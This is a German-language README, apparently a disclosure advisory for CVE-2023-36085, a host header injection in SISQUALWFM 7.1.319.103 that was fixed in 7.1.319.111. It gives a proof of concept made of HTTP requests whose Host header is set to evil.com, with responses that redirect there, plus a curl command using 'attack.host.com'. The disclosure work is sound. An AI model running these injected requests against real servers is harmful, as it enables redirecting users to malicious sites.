
Dieses Repository enthält Informationen zu CVE-2023-36085, einer Host-Header-Injection-Schwachstelle, die in SISQUALWFM Version 7.1.319.103 entdeckt wurde und es einem Angreifer ermöglicht, Weblinks zu manipulieren oder Benutzer auf eine bösartige Website umzuleiten. Dieser Schwachstelle wurde CVE-2023-36085 zugewiesen und sie wurde in Version 7.1.319.111 und höher behoben.
Dieses Repository enthält Informationen zu einer Host-Header-Injection-Schwachstelle, die in SISQUALWFM Version 7.1.319.103 entdeckt wurde. Sie ermöglicht es einem Angreifer, Webseiten-Links zu manipulieren oder Benutzer auf eine bösartige Website umzuleiten. Dieser Schwachstelle wurde CVE-2023-36085 zugewiesen und sie wurde in Version 7.1.319.111 und höher behoben.
Wir stellen ein Proof-of-Concept-Szenario zur Verfügung, das die Host-Header-Injection-Schwachstelle demonstriert, insbesondere gegen den Endpunkt /sisqualIdentityServer/core. Diese Schwachstelle ermöglicht es einem Angreifer, Webseiten-Links zu manipulieren oder Benutzer auf eine andere Website umzuleiten, indem er den Host-Header verändert.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Um diese Schwachstelle auszunutzen, kann ein Angreifer den folgenden curl-Befehl verwenden, um den Host-Header zu ändern:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Dieses Repository dient ausschließlich zu Informationszwecken und sollte nicht für böswillige Aktivitäten verwendet werden. Die Schwachstelle wurde dem Hersteller verantwortungsvoll offengelegt und das Problem wurde behoben. Es ist von entscheidender Bedeutung, ethische Hacking-Richtlinien zu befolgen und die Praktiken der verantwortungsvollen Offenlegung (Responsible Disclosure) zu respektieren, wenn Schwachstellen identifiziert und gemeldet werden.